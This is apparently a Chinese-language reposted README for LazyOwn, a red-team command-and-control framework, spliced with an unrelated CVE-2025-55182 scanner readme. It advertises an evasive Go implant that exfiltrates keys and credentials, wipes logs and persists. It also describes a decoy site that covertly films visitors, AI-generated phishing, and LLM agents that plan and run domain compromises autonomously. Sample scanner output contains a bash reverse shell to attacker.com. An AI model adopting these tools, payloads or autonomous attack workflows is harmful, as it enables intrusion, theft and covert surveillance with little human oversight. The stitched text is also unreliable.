自动化红蓝对抗测量循环,执行攻击性操作,查询 LazyOwnBT 进行检测,并将结果反馈给检测预言机以进行校准。```bash (LazyOwn) > purple_exec nmap -sV 10.10.11.5 recon # execute + detect (LazyOwn) > purple_score # show detection rates (LazyOwn) > purple_report # export CSV + JSON (LazyOwn) > purple_dashboard # Textual TUI

root@kitploit:~
**检测方法:**

| 方法 | 检查内容 |
|--------|----------------|
| `ai_test` | LazyOwnBT ML 模型预测 |
| `proc_scan` | 可疑进程名称 |
| `net_scan` | 异常连接/端口 |
| `log_analyze` | 认证/syslog 异常 |
| `fim_scan` | 文件完整性变更 |
| `redteam_hunt` | 威胁狩猎模式 |
| `sigma_rules` | 10 条 Sigma 规则(mimikatz、反向 shell、提权、nmap、webshell、/etc/shadow、cron、SMB、数据外泄、注入) |

**Sigma 规则检测引擎**(LazyOwnBT `lazyownbt/detection.py`):

| ID | 规则 | 级别 |
|----|------|-------|
| LAZYOWN-001 | Mimikatz 凭据转储 | critical |
| LAZYOWN-002 | 反向 Shell 模式 | critical |
| LAZYOWN-003 | 通过 Sudo 提权 | high |
| LAZYOWN-004 | 检测到 Nmap 扫描 | medium |
| LAZYOWN-005 | Webshell 执行 | critical |
| LAZYOWN-006 | 进程注入 | high |
| LAZYOWN-007 | /etc/shadow 访问 | critical |
| LAZYOWN-008 | Cron 持久化 | high |
| LAZYOWN-009 | SMB 横向移动 | high |
| LAZYOWN-010 | 数据外泄 | high |

**输出文件:**
- `sessions/purple_dataset.csv` — ML 训练数据集
- `sessions/purple_audit.jsonl` — 完整审计日志
- `sessions/detection_feedback.jsonl` — oracle 校准

**注意:** 生产环境中,请通过 auditd 日志转发与真实 SIEM(Wazuh、Elastic SIEM、Splunk)集成。内置 Sigma 规则仅用于离线测试。

### Hive Mind — `skills/hive_mind.py`

多智能体 queen+drone 架构,具有共享内存:
- **QueenBrain**(Claude):高层编排 + 用于高风险操作的 ConsensusProtocol
- **DronePool**(Groq/Ollama):并行执行 recon/exploit/cred/lateral/privesc 任务
- **HiveMemory**:ChromaDB 语义 + SQLite 情景 + Parquet 长期存储
- **EpisodeReflectionEngine**:战役后经验提取,存储为 `sessions/campaign_lessons.jsonl`

### 自主战役智能(ACI)— `skills/aci_planner.py`

**首个能够自主规划、执行和学习的 C2 框架。**

ACI 弥合了自然语言交战目标与完全自主执行循环之间的差距。没有任何竞争对手(Cobalt Strike、Sliver、Havoc、Metasploit)能够端到端地做到这一点:```
Operator: "Compromise the domain controller at corp.internal
           starting from a phishing foothold on 10.10.11.5"
         ↓
ACI Planner ──► MITRE ATT&CK decomposition (LLM-backed, static fallback)
                 recon → exploit → exec → privesc → cred → lateral → report
         ↓
ObjectiveStore ─► 20+ concrete objectives injected into sessions/objectives.jsonl
         ↓
auto_loop / autonomous_daemon ─► executes each objective autonomously
         ↓
ACIEngine monitors ─► detects stalled phases (blocked_count ≥ 3)
         ↓
ACIReplan ──► LLM generates alternative techniques for blocked phases
         ↓
ACIReflector ──► appends lessons to sessions/campaign_lessons.jsonl
                 feeds back into the next engagement

三个 MCP 工具:

工具功能
lazyown_aci_plan将目标分解 → ATT&CK 计划 → 注入目标
lazyown_aci_status实时阶段分解、完成百分比、重新规划建议
lazyown_aci_replan在停滞时强制自适应重新规划;自动生成经验教训

快速开始:```python

1. Submit the engagement goal

lazyown_aci_plan( goal="Compromise the DC at corp.internal", target="10.10.11.5", scope=["10.10.11.0/24"], domain="corp.internal", os_hint="windows", )

2. Start autonomous execution

lazyown_auto_loop(target="10.10.11.5", max_steps=20)

3. Monitor progress

lazyown_aci_status()

4. When blocked (blocked_count >= 3)

lazyown_aci_replan(reason="Kerberoasting blocked by AV, try AS-REP roasting")

root@kitploit:~
**ACI 与其他工具相比的独特之处:**

- Cobalt Strike / Sliver / Havoc 是 C2 框架——操作员规划每一步
- Metasploit 有自动化但没有智能
- CALDERA 模拟固定的 ATT&CK 过程,但无法适应新环境
- **ACI 规划、执行、重新规划并学习——持续地,跨交战行动**

**持久化:**

| 文件 | 内容 |
|------|----------|
| `sessions/aci_plan.json` | 活动计划:阶段、目标、完成状态 |
| `sessions/aci_history.jsonl` | 已归档的已完成/已放弃计划 |
| `sessions/campaign_lessons.jsonl` | 由 ACIReflector 提取的经验教训 |

**CLI 用法(独立运行):**```bash
python3 skills/aci_planner.py plan "Compromise DC" --target 10.10.11.5 --os windows
python3 skills/aci_planner.py status
python3 skills/aci_planner.py replan "technique blocked"
python3 skills/aci_planner.py reflect

自主守护进程 — skills/autonomous_daemon.py

单个进程中的四个 asyncio 角色 — 步骤之间无需 Claude:``` Role 1 — ObjectiveLoop : watches objectives.jsonl, takes + executes Role 2 — ExecutionEngine : 6-layer cascade per step, RL Q-table feedback Reactive → Parquet → Bridge → SWAN(MoE+RL) → LLM → Fallback Role 3 — WorldModelWatcher : graph centrality + pivot candidate tracking Role 4 — DroneCoordinator : hive drone spawning on recon/cred/service findings

root@kitploit:~
在守护进程中启用 SWAN:启动前执行 `export AUTO_USE_SWAN=1`。

ACI 馈入守护进程:由 `lazyown_aci_plan` 注入的目标会被 Role 1(ObjectiveLoop)自动拾取——无需额外配置。

### 基于图的推理 — `modules/world_model.py`

NetworkGraph 跟踪所有已发现的关系(主机、服务、凭据、信任路径),并计算归一化度中心性以浮现枢轴候选。前 3 个候选会被注入到每次 `to_context_string()` 调用中,确保自主循环始终知晓最高价值的横向移动目标。

## 授权范围守卫

一个从 `payload.json` 读取目标的红队框架存在一个尖锐的隐患:一个误写的 `rhost` 会向未授权主机发起攻击性命令。范围守卫就是安全网。每条交互式命令都流经单一检查点,在命令运行前将当前活动目标与你的授权交战范围进行比对。```bash
(LazyOwn) > scope add 10.10.11.0/24       # CIDR, bare IP, hostname, or *.corp.local wildcard
(LazyOwn) > scope add dc.corp.local
(LazyOwn) > scope mode enforce            # off | warn (default) | enforce
(LazyOwn) > scope                         # show current scope and posture
  • 设计上故障开放:当作用域为空或模式为 off 时处于休眠状态,因此在你选择启用之前,现有活动不受影响。任何内部错误都会允许命令执行,而不是阻止操作员。
  • warn 会标注超出作用域的进攻性命令;enforce 会阻止这些命令,等待明确确认(并在非交互式会话中拒绝执行)。
  • 仅对进攻性杀伤链类别进行门控;报告、配置和本地辅助工具始终运行。新的进攻性 do_* 命令会被自动分类。
  • 存储在 payload.json(scope、scope_enforcement)中;纯逻辑位于 cli/scope_guard.py,与 shell 零耦合。

可复现安装

依赖项在 pyproject.toml 中一次性声明(单一事实来源),并固定版本以实现可复现安装:

  • requirements.txt — 跨平台核心锁定(不含 CUDA wheels)。
  • requirements-ml.txt — 可选的重型 ML 栈(torch/CUDA、scikit-learn)。
  • install.sh 在严格模式下运行且幂等。默认安装为轻量级;可通过 --with-ml(2 GB ML 栈)、--with-ollama(本地 LLM 运行时)和 --with-tools(常用外部二进制文件)选择安装额外组件。
  • 开发者:pip install -e .[ml,dev]。

主要功能

  1. 741 个攻击命令:全面覆盖 Linux、Windows、macOS 和 BSD 的杀伤链——侦察、枚举、利用、提权、横向移动、凭据访问、C2、数据外泄和报告。
  2. 交互式 cmd2 CLI:模糊自动补全、可配置的霓虹框提示符、命令面板(Ctrl+K)、每条命令后的内联响应式提示,以及 Textual TUI 仪表板。
  3. 集成市场:yara_marketplace(10 条内置规则:勒索软件、C2、webshell、混淆、提权)、nuclei_marketplace(500+ 模板)、用于社区插件/附加组件的 marketplace——均可通过 curses TUI 浏览。
  4. auto_pwn 与 hunt:自主利用链和威胁情报驱动的侦察——auto_pwn 自动遍历杀伤链阶段,hunt 基于已知 TTP 执行定向发现。
  5. 统一命令后提示引擎:智能建议(杀伤链提示、专业提示、好奇心、自动建议),带有 ELO 评级、徽章(First Blood、Arsenal Master、Kill Chain Master)和 VRI 奖励——游戏化操作员体验。
  6. 自动会话加密:auto_crypto 在退出时加密敏感会话文件,并在启动时解密(PBKDF2HMAC + Fernet),对操作员透明。
  7. AI 原生架构:MoE(专家混合)路由器、RL 训练、SWAN 编排器、Hive Mind 多智能体系统、ACI(自主活动情报)规划器——首个能够自主规划、执行和学习的 C2。
  8. 多阶段混淆 Go 植入体:两阶段 XOR 编码信标投递,带 C 存根、AES-256 加密 C2 通道、VM/沙箱/调试器规避、多态性,以及基于 LOLBAS 的 stager。已在 Kernel 6.12 和 Windows 10.0.20348 上测试。
  9. Linux BOF(Beacon Object Files):首个通过 ELF dlopen 运行时为 Linux 提供 BOF 支持的开源 C2 框架。与 Windows BOF 契约源码兼容的 datap API。支持直接系统调用和 io_uring。
  10. 诱饵蓝队陷阱:Flask 诱饵网站会录制视频/音频并捕获未授权访问者(探测 C2 的蓝队操作员)的图像,存储在 sessions/captured_images 中。
  11. Bloodhound 攻击面:上传 Bloodhound ZIP 数据以渲染交互式攻击面图,支持过滤和搜索,并由 lazynmap 发现数据增强。
  12. AI 驱动的钓鱼引擎:Groq/DeepSeek AI 生成的电子邮件模板,带动态 URL 生成、跟踪像素、URL 缩短和测试端点创建。

  1. 诱饵:如果 IP 地址与 127.0.0.1 或 lhost 不匹配,Flask 将显示一个诱饵网站,该诱饵网站会录制带音频的视频并拍摄入侵者的照片(sessions/captured_images),就像一个小型版 storm breaker,用于了解蓝队操作员是谁

image

  1. 对手模拟:用于生成红队作战会话的高级功能,确保细致且有效的模拟。

adversay emulator

  1. 任务调度:利用 cron 命令调度和自动化任务,实现持久威胁模拟。
  2. 实时结果:从安全评估中获取即时反馈和结果,确保及时准确的洞察。
  3. RAT 和僵尸网络功能:包括远程访问和控制功能,允许管理僵尸网络和持久威胁。
  4. AI 驱动的 C2 框架:充当命令与控制(C2)框架,实现对受感染系统的隐蔽通信和控制。以及许多 AI 机器人来改善你的 opsec,使用 Flask 开发,提供用户友好的界面以实现无缝交互。现在具备网络发现功能,使我们能够通过过滤器和搜索面板清晰直观地在客户端地图上看到攻击面。新功能即将推出。 image

vulnbot

  • C2 LazyAddon 创建器:C2 仪表板中的引导式 /addons 页面,用于编写 lazyaddons/*.yaml 集成,无需手动接触 YAML。一个表单暴露所有附加组件选项(名称、描述、作者、版本、启用状态、目标操作系统、触发服务、类别、模块类型、安装类型、参数、工具块、C2 额外项、环境变量),并带有工具提示、占位符和逐字段帮助。占位符标签({rhost}、{url}、声明的参数以及每个 payload.json 键)可拖放到命令框中。服务器端验证会在写入文件之前拒绝不安全名称、路径遍历、未知占位符和格式错误的 URL;写入是原子且安全的(通过 mkstemp + fchmod 创建具有限制性权限的临时文件,刷新并 fsync,然后使用 os.replace 提升)。列表和 YAML 预览页面完善了整个生命周期。每个变更路由都受 CSRF 保护。契约:lazyc2/addon_creator.py + lazyc2/blueprints/addons.py,由 tests/test_addon_creator.py 和 tests/run_mutation_addon_creator.py 变异门覆盖。
  1. 不可检测、混淆且可塑的 GO 植入体:带 payload 的命令默认经过混淆。它不直接下载信标,而是下载一个用 C 创建的存根来下载信标,该信标使用密钥进行 XOR 编码。然后在内存中解码,并以唯一名称在临时路径中执行以规避检测,在 Windows 中使用 svchost,在 Linux 中使用 lazyservice。这执行两阶段植入,已在 Kernel 6.12 和 Windows [Version 10.0.20348.3807] 上测试。此外,还添加了使用 LOLBAS PS1 和 Csharp 的替代 Windows 存根,以及使用相同技术的 LOLBAS 版 ebird3。Go 信标是一个多平台、不可检测且高度混淆的植入体,专为高级红队作战量身定制。它具有多态性,在可配置的隐蔽模式下运行,并通过 AES-256 加密通道保护通信。该信标通过模拟合法网络流量融入环境,并通过识别虚拟机、沙箱、容器和调试器来规避检测,动态调整其行为。它以极小的占用空间,通过基于 ping 的主机枚举和对已配置目标的端口扫描支持强大的网络发现。该植入体擅长外泄敏感数据,包括私钥、AWS 凭据、浏览器凭据和系统日志。它提供用于流量重定向的动态 TCP 代理、提权尝试和系统日志清理。通过计划任务、systemd、crontab 和 LaunchAgents 在 Windows、Linux 和 macOS 上实现持久化。其他功能包括对手模拟(MITRE ATT&CK)、文件时间戳混淆和用于外泄的目录压缩。该植入体使用 Go vet 构建以确保代码健康,可与 Docker 化环境和 AWS Firecracker microVM 无缝集成,使其成为现代红队基础设施的基石。该植入体使用 Go vet 构建以确保代码完整性,利用 Cloudflare 进行流量混淆,通过安全、高性能的重定向器路由通信以隐藏 C2 基础设施。Go 二进制文件使用 Garble 混淆进行加固,阻止逆向工程和基于签名的检测。在 Windows 上,该植入体采用扩展名伪装来冒充良性文件(例如 .pdfx),并通过 rsrc 嵌入自定义图标以实现令人信服的社会工程。

image

可用信标命令:

  • stealth_off 停止隐蔽,禁用隐蔽模式,允许正常操作。
  • stealth_on 进入忍者模式,启用隐蔽模式,最小化活动以避免检测。
  • download: download:[filename] 从 C2 下载文件到受感染主机。
  • upload: [filename]: 从受感染主机上传文件到 C2。
  • rev: 使用配置的端口建立到 C2 的反向 shell。
  • exfil: 外泄敏感数据(例如 SSH 密钥、AWS 凭据、命令历史)。
  • download_exec: download_exec:[url]: 从 URL 下载并执行二进制文件(仅限 Linux,存储在 /dev/shm)。
  • obfuscate: [filename]: 混淆文件时间戳以阻碍取证分析。
  • cleanlogs: 清除系统日志(例如 Linux 上的 /var/log/syslog、Windows 上的事件日志)。
  • discover: 执行网络发现,通过 ping 识别活动主机。
  • adversary:[id_atomic]: 使用下载的 atomic redteam 框架脚本执行对手模拟测试(MITRE ATT&CK)。
  • softenum: 枚举主机上有用的软件(例如 docker、nc、python)。
  • netconfig: 捕获并外泄网络配置(例如 Windows 上的 ipconfig、Linux 上的 ifconfig)。
  • escalatelin: 尝试在 Linux 上提权(例如通过 sudo -n 或 SUID 二进制文件)。
  • proxy:[listenip]:[listenport]:[targetip]:[targetport] 启动 TCP 代理,将流量从 listenAddr 重定向到 targetAddr。
  • stop_proxy:[listenaddr] 停止指定地址上的 TCP 代理。
  • portscan: 扫描已发现主机和已配置 rhost 上的端口。
  • compressdir:[directory]: 将目录压缩为 .tar.gz 文件并外泄。
  • sandbox: 获取系统是否为沙箱的信息。
  • isvm: 获取系统是否为虚拟机的信息。
  • debug: 获取目标是否被调试的信息。
  • persist: 尝试在目标系统中建立持久化机制。

v0.2.161 亮点

统一杀伤链(单一事实来源)

  • modules/killchain.py 计算阶段;每个界面(CLI /killchain、/api/killchain、C2 /api/data+/api/dashboard、GUI2 面板)渲染其 snapshot()。
  • 每个植入体的信标命令历史:/api/beacon_results/<client_id>,由 modules/beacon_history.py 支持(JSONL,路径安全)。
  • CLI /killchain auto on|off|N 实时自动刷新;标志 killchain_auto_every / killchain_auto_on_phase_change。
  • C2 在启动时解密会话状态,并在干净退出时重新加密,因此信标和杀伤链在服务器运行时反映真实值。

市场(YARA + Nuclei)

从统一市场 TUI 浏览、搜索和安装:

  • yara_marketplace list|search|install|info -- 10 条内置规则(勒索软件、C2、webshell、混淆、提权)
  • nuclei_marketplace list|search|install|info -- 来自 ~/nuclei-templates 的 500+ 模板
  • marketplace list|search|install|update -- 137 个 YAML 附加组件、57 个插件、69 个工具

auto_pwn 与 hunt

  • auto_pwn -- 从侦察到利用的自主杀伤链遍历
  • hunt -- 威胁情报驱动的侦察:将已知 TTP 映射到已发现的服务

响应式智能

  • 命令后提示引擎:杀伤链提示、专业提示、好奇心奖励
  • ELO 评级、徽章(First Blood、Arsenal Master、Kill Chain Master)
  • 内联响应式提示:每个操作后的“下一条命令”建议

自动加密

通过 PBKDF2HMAC + Fernet 在退出时透明加密会话 / 在启动时解密。

新剧本

7 个 APT 配置文件:Azure Graph API、CICD Poisoning、Entra Connect、macOS TCC、OAuth Token Theft、SCCM/MECM、VDI Breakout。

交互式链模式

chainmode on 启动由世界模型驱动的链接流程:每条命令后,shell 提供排序的下一步建议(Enter = 首选建议,1..N = 排序的备选方案,任意命令 = 覆盖,skip = 手动,ESC/Ctrl+C/off = 离开)。无效选择会重新提示,而不是静默跳过,并且流程会在 max_steps 条链式命令后自动暂停。状态持久化在 sessions/chain_mode.json(原子写入)。契约:cli/chain_mode.py + cli/command_chain.py。

功能打磨(UX + 安全加固)

  • 有证据支持的内联提示:每个建议都带有动词、置信度([0, 99],绝不使用不诚实的 100%)、原因和来源。契约:cli/reactive_hints.py + cli/recommendation_signals.py。
  • 统一提示引擎完全通过 rich 渲染(无原始 ANSI 转义);注册表提示文本永远不会破坏标记渲染。契约:cli/tips_engine.py。
  • cli/noise_verbs.py 是提示、提示和链模式共享的不可操作动词列表的单一事实来源。
  • 租户绑定 API 密钥:core/api_authz.py 现在实现文档化的轮换宽限期,从轮换密钥复制权限(回归已修复),返回 JSON 401/403(与 TRAP_HTTP_EXCEPTIONS 一起使用安全),并且 C2 /api/health/tenant 端点实际强制执行。变异门:tests/run_mutation_api_authz.py(7/7 杀死)。
  • core/logging.py 的 install_json_handler 保留预先存在的处理器并且是幂等的。
  • 结构化 ELO 同步遵循重定向的用户存储路径,并且测试独立于主机登录。

安全加固(SDD+TDD+BDD)

在 core/hardening.py 中集中安全原语,包含 48 个 BDD 风格测试(tests/test_security_hardening_v3.py)。运行方式:```bash pytest tests/test_security_hardening.py tests/test_security_hardening_v2.py tests/test_security_hardening_v3.py -v mutmut run # 122/228 killed, 53.5% kill rate on core/hardening.py

root@kitploit:~
**已应用的关键修复:**
- 从 `anti_forensics.py`、`pivoting.py`、`icmp_server.py`、`resource_script.py`、`command_executor.py`、`postexp_migrated.py` 中消除了 `shell=True`(22 处)
- 从 `persist_migrated.py`、`cloud.py`、`lazyown.py`(4 处)、`misc_migrated.py` 中消除了 `os.system()`
- 从 `websocket_beacon.py`、`evasive_payload.py` 中消除了 `os.popen()`
- 在 4 个文件(C2、lateral、exfil、persist)中将 `sshpass -p` 替换为 `sshpass -e` + 环境变量
- 从 `phishing_orchestrator.py` 中移除了硬编码的加密密钥(`ENCRYPTION_KEY` 为强制项)
- 使用 `html.escape()` 修复了 C2 banner 中的 XSS
- 使用 `safe_clipboard_copy()` 修复了通过剪贴板中 rhost 进行的命令注入
- 将 cmd2 的 `CMD_ATTR_HELP_CATEGORY` 重命名为 `COMMAND_ATTR_HELP_CATEGORY`(兼容 cmd2 4.2.2)

---

## 命令能力

LazyOwn 在 13 个 kill-chain 阶段中提供了 741 条命令,可从 CLI 和 Web C2 仪表板中使用:

| 阶段 | 重点命令 |
|-------|-------------------|
| Recon | `lazynmap`、`ping`、`whatweb`、`gobuster`、`ffuf`、`dig`、`dnsenum`、`finalrecon` |
| Enum | `enum4linux`、`cme`、`bloodhound`、`nuclei`、`kerbrute`、`ldapdomaindump` |
| Exploit | `auto_pwn`、`hunt`、`ss`(searchsploit)、`venom`、`lazymsfvenom`、`searchhash` |
| Post-Exploit | `linpeas`、`winpeas`、`blacksandbeacon`、`mimikatzpy`、`disableav` |
| Persistence | `persist`、`backdoor`、`cron`、`schtask`、`createwebshell` |
| PrivEsc | `getcap`、`sudo`、`adcs_check`、`privesc_predictor` |
| Cred Access | `secretsdump`、`evil`、`getnpusers`、`hashcat`、`john`、`spraykatz` |
| Lateral | `psexec`、`wmiexec`、`ssh_cmd`、`chisel`、`ligolo`、`bloodhound` |
| Exfil | `exfil`、`upload_gofile`、`encrypt`/`decrypt`、`compressdir` |
| C2 | `lazyc2`、`blacksandbeacon`、`createrevshell`、`listener_go` |
| Reporting | `report`、`lazyreport`、`campaign_sitrep`、`timeline`、`dashboard` |
| AI/Agents | `auto_loop`、`recommend_next`、`playbook_generate`、`playbook_run`、`orchestrate` |
| Marketplace | `yara_marketplace`、`nuclei_marketplace`、`marketplace`、`lab` |

核心管理:`assign`、`show`、`doctor`、`wizard`、`scope`、`collab_join`、`config_banner`、`palette`、`fz`。

请参阅 [`COMMANDS.md`](https://github.com/grisuno/lazyown/blob/main/COMMANDS.md) 获取完整的 606 条命令参考,以及 [`ESSENTIALS.md`](https://github.com/grisuno/lazyown/blob/main/ESSENTIALS.md) 获取覆盖 80% 交战的 18 条命令。

# 使用 Lua 插件扩展 LazyOwnShell

本文档说明如何使用 Lua 脚本扩展 `LazyOwnShell` 应用程序的功能,该应用程序基于 Python 的 `cmd2` 框架构建。Lua 允许你编写自定义插件,以添加新命令、修改现有行为或访问应用程序数据。

![image](https://assets.kitploit.com/production/public/readmes/56369/c299c50e76da30a39158e7121eb350b9c906048783727107fb9ca556c5317878/f2fa2be6395535c04e8fe7e5630c65d7112913560e76ea2c6a6e0144be148795-display-v1.webp)

---

## 目录

1. [简介](#introduction)
2. [设置 Lua 插件](#setting-up-lua-plugins)
3. [编写 Lua 插件](#writing-lua-plugins)
4. [注册新命令](#registering-new-commands)
5. [访问应用程序数据](#accessing-application-data)
6. [错误处理](#error-handling)
7. [示例插件](#example-plugins)
8. [最佳实践](#best-practices)

---

## 1. 简介

`LazyOwnShell` 应用程序支持 Lua 脚本,允许用户在不修改核心 Python 代码的情况下扩展其功能。Lua 脚本(插件)存储在 `plugins/` 目录中,并在应用程序启动时自动加载。

Lua 插件可以:
- 向 shell 添加新命令。
- 修改现有命令或行为。
- 访问和操作由 Python 公开的应用程序数据。

---

## 2. 设置 Lua 插件

要使用 Lua 插件,请确保以下事项:

1. 在你的 Python 环境中安装 `lupa` 库:   ```bash
   pip install lupa
root@kitploit:~
plugins/
     init_plugins.lua
     hello.lua
     goodbye.lua

当应用程序启动时,它将执行 init_plugins.lua,该文件会加载 plugins/ 目录中的所有其他 .lua 文件。

  1. 编写 Lua 插件 Lua 插件是放置在 plugins/ 目录中、扩展名为 .lua 的脚本文件。每个插件可以定义函数并将其注册为 shell 中的命令。

Lua 插件的结构 ```lua -- Define a function for the new command function my_command(arg) -- Your logic here print("This is a new command: " .. (arg or "default")) end

root@kitploit:~
-- Register the function as a command
register_command("my_command", my_command)
root@kitploit:~
关键函数
- register_command(command_name, lua_function):
- 在 shell 中注册一个新命令。
- command_name:命令的名称(例如 hello)。
- lua_function:调用该命令时要执行的 Lua 函数。

3. 注册新命令

 要向 shell 添加新命令,请按照以下步骤操作:

- 定义一个实现命令逻辑的 Lua 函数。
- 使用 register_command 将该函数注册为命令。
- 示例:添加一个 hello 命令
- 创建一个文件 plugins/hello.lua,内容如下:   ```lua
 function hello(arg)
     local name = arg or "world"
     print("Hello, " .. name .. "!")
 end

 register_command("hello", hello)

现在,你可以在 shell 中运行 hello 命令: bash hello Lua Hello, Lua! 4. 最佳实践

  • 保持插件模块化:每个插件应专注于单一功能或特性。
  • 为插件编写文档:为每个插件提供清晰的文档,包括使用示例。
  • 彻底测试:在将插件集成到主应用程序之前,先单独测试它们。
  • 优雅地处理错误:使用 pcall 处理 Lua 插件中的错误并防止崩溃。

通过利用 Lua 脚本,你可以在不修改核心 Python 代码的情况下扩展 LazyOwnShell 的功能。这带来了更大的灵活性和可定制性,使用户能够编写自己的插件以满足特定需求。编码愉快!

LazyAddons YAML 系统

得益于 LazyAddons 系统,扩展 LazyOwn RedTeam Framework 的能力从未如此简单,即使对于非程序员也是如此,该系统允许使用 YAML 文件扩展功能。

通过 YAML 配置文件进行声明式命令创建。

文件结构

lazyaddons/ ├── addon1.yaml ├── addon2.yaml └── example.yaml

🛠️ 插件定义

最小示例```yaml

name: "shortname" # CLI command (do_shortname) enabled: true description: "Tool description for help system"

tool: name: "Full Tool Name" repo_url: "https://github.com/user/repo" install_path: "tools/toolname" execute_command: "python tool.py -u {url}"

root@kitploit:~
高级配置```yaml
params:
  - name: "url"
    required: true
    description: "Target URL"
    default: "http://localhost"

  - name: "threads"
    required: false
    default: 4

功能 自动安装 当工具缺失时从 Git 克隆:```bash git clone <repo_url> <install_path>

root@kitploit:~
参数替换
将命令中的 {param} 替换为来自以下来源的值:

- 命令参数

- 默认值

- self.params

- 帮助集成

help <command> 显示 YAML 描述。

模板```yaml
name: ""
enabled: true
description: ""

tool:
  name: ""
  repo_url: ""
  install_path: ""
  install_command: ""  # Optional
  execute_command: ""

params:
  - name: ""
    required: true/false
    default: ""
    description: ""

▶️ 使用方法 将 YAML 文件放入 lazyaddons/

启动你的 CLI 应用程序

执行已注册的命令:```bash (Cmd) help your_command (Cmd) your_command -args

root@kitploit:~
🚨 故障排除
缺少参数:验证 YAML 中的必填字段

安装失败:检查网络/git 访问权限

命令错误:验证 execute_command 语法


主要特性:
- 简洁的 GitHub 风格 markdown
- 仅专注于 YAML 插件
- 包含即用型模板
- 记录参数替换系统
- 提供故障排除提示

需要我添加任何具体示例或使用场景吗?

![LazyOwnGris3](https://assets.kitploit.com/production/public/readmes/56369/e33455dad0ebc6b7279e64d6befcf165ce82ef5d21df552c9c6207e517842ac6/f44814861f7107d595f4c1c2f543f527ae55c37bbd3146414a6050250ef1c7e4-display-v1.webp)


LazyOwn 在 Reddit 上

用 LazyOwn 彻底改变你的渗透测试:自动化对 Linux、MAC OSX 和 Windows 受害者的入侵

<https://www.reddit.com/r/LazyOwn/>


<https://github.com/grisuno/LazyOwn/assets/1097185/eec9dbcc-88cb-4e47-924d-6dce2d42f79a>

探索 LazyOwn,这是自动化渗透测试工作流程以攻击 Linux、MacOSX 和 Windows 系统的终极解决方案。我们强大的工具简化了渗透测试,使其更高效、更有效。观看此视频,了解 LazyOwn 如何简化你的安全评估并增强你的网络安全工具包。```sh
LazyOwn> assign rhost 192.168.1.1
[SET] rhost set to 192.168.1.1
LazyOwn> run lazynmap
[INFO] Running Nmap scan on 192.168.1.1
...

LazyOwn 是网络安全专业人员的理想选择,他们寻求一种集中且自动化的渗透测试解决方案,从而节省时间并提高识别和利用漏洞的效率。

Captura de pantalla 2024-05-22 021136

要求

  • Python 3.x

  • Python 模块:

    • requests
    • python-libnmap
    • pwncat-cs
    • pwn
    • groq
    • PyPDF2
    • docx
    • python-docx
    • olefile
    • exifread
    • pycryptodome
    • impacket
    • pandas
    • colorama
    • tabulate
    • pyarrow
    • keyboard
    • flask-unsign
    • name-that-hash
    • certipy-ad
    • ast
    • pykeepass
    • cmd2
    • Pillow
    • netaddr
    • stix2
    • pyautogui
  • subprocess(包含在 Python 标准库中)

  • platform(包含在 Python 标准库中)

  • tkinter(GUI 可选)

  • numpy(GUI 可选)

安装

  1. 克隆仓库:```sh git clone https://github.com/grisuno/LazyOwn.git cd LazyOwn
root@kitploit:~
2. 安装 Python 依赖:```sh
./install.sh

使用

image```sh ./run or ./fast_run_as_r00t.sh

./run --help [;,;] LazyOwn vvvrelease/0.2.8 Usage: ./run [Options] Options: --help Show this help panel. -v Show version. -p <payloadN.json> Exec with different payload.json example. ./run -p payload1.json, (Special for RedTeams) -c Exec a command using LazyOwn example: ping --no-banner No Banner -s Run as root --old-banner Show old Banner

./fast_run_as_r00t.sh --vpn 1 (the number id of your file in vpn directory)

root@kitploit:~
## 使用示例

### 基本用法

```bash
# 扫描单个目标
python3 cve_2025_55182.py -t https://target.example.com

# 使用详细输出进行扫描
python3 cve_2025_55182.py -t https://target.example.com -v

# 从文件扫描多个目标
python3 cve_2025_55182.py -f targets.txt -o results.json

# 使用自定义超时和线程数进行扫描
python3 cve_2025_55182.py -t https://target.example.com --timeout 15 --threads 20

高级用法

root@kitploit:~
# 使用代理进行扫描
python3 cve_2025_55182.py -t https://target.example.com --proxy http://127.0.0.1:8080

# 使用自定义 User-Agent 进行扫描
python3 cve_2025_55182.py -t https://target.example.com --user-agent "Mozilla/5.0"

# 使用自定义载荷进行扫描
python3 cve_2025_55182.py -t https://target.example.com --payload "custom_payload"

# 使用自定义回调 URL 进行扫描
python3 cve_2025_55182.py -t https://target.example.com --callback "https://your-server.com/callback"

命令行选项

root@kitploit:~
用法: cve_2025_55182.py [-h] [-t TARGET] [-f FILE] [-o OUTPUT] [-v] [--timeout TIMEOUT]
                        [--threads THREADS] [--proxy PROXY] [--user-agent USER_AGENT]
                        [--payload PAYLOAD] [--callback CALLBACK]

选项:
  -h, --help            显示此帮助信息并退出
  -t TARGET, --target TARGET
                        要扫描的单个目标 URL
  -f FILE, --file FILE  包含目标 URL 的文件(每行一个)
  -o OUTPUT, --output OUTPUT
                        将结果保存到文件(JSON 格式)
  -v, --verbose         启用详细输出
  --timeout TIMEOUT     请求超时时间(秒)(默认:10)
  --threads THREADS     并发线程数(默认:10)
  --proxy PROXY         用于请求的代理 URL
  --user-agent USER_AGENT
                        自定义 User-Agent 字符串
  --payload PAYLOAD     用于测试的自定义载荷
  --callback CALLBACK   用于带外检测的自定义回调 URL

输出格式

该工具支持多种输出格式:

控制台输出

root@kitploit:~
[+] 正在扫描: https://target.example.com
[+] 目标存在漏洞: CVE-2025-55182
[+] 载荷: /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
[+] 响应时间: 1.23s
[+] 状态: 易受攻击

JSON 输出

root@kitploit:~
{
  "target": "https://target.example.com",
  "vulnerable": true,
  "cve": "CVE-2025-55182",
  "payload": "/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'",
  "response_time": 1.23,
  "status": "vulnerable",
  "timestamp": "2025-01-15T10:30:00Z"
}

检测方法

该工具采用多种检测技术:

  1. 基于时间的检测:测量响应时间以识别盲注漏洞
  2. 基于错误的检测:分析错误消息以识别漏洞
  3. 带外检测:使用回调 URL 检测盲注漏洞
  4. 基于响应的检测:分析响应内容以识别漏洞

漏洞详情

CVE-2025-55182

  • 类型:远程代码执行(RCE)
  • 严重性:严重
  • CVSS 评分:9.8
  • 受影响组件:React Server Components
  • 描述:React Server Components 中的一个漏洞,允许攻击者通过特制请求执行任意代码。

技术细节

该漏洞存在于 React Server Components 处理序列化数据的方式中。攻击者可以发送特制请求,导致服务器反序列化恶意数据,从而执行任意代码。

影响

成功利用此漏洞可能允许攻击者:

  • 在服务器上执行任意代码
  • 访问敏感数据
  • 修改或删除数据
  • 在网络上横向移动
  • 安装后门或恶意软件

缓解措施

立即行动

  1. 更新 React:升级到最新版本的 React
  2. 应用补丁:应用供应商提供的任何安全补丁
  3. 禁用 RSC:如果不需要,禁用 React Server Components
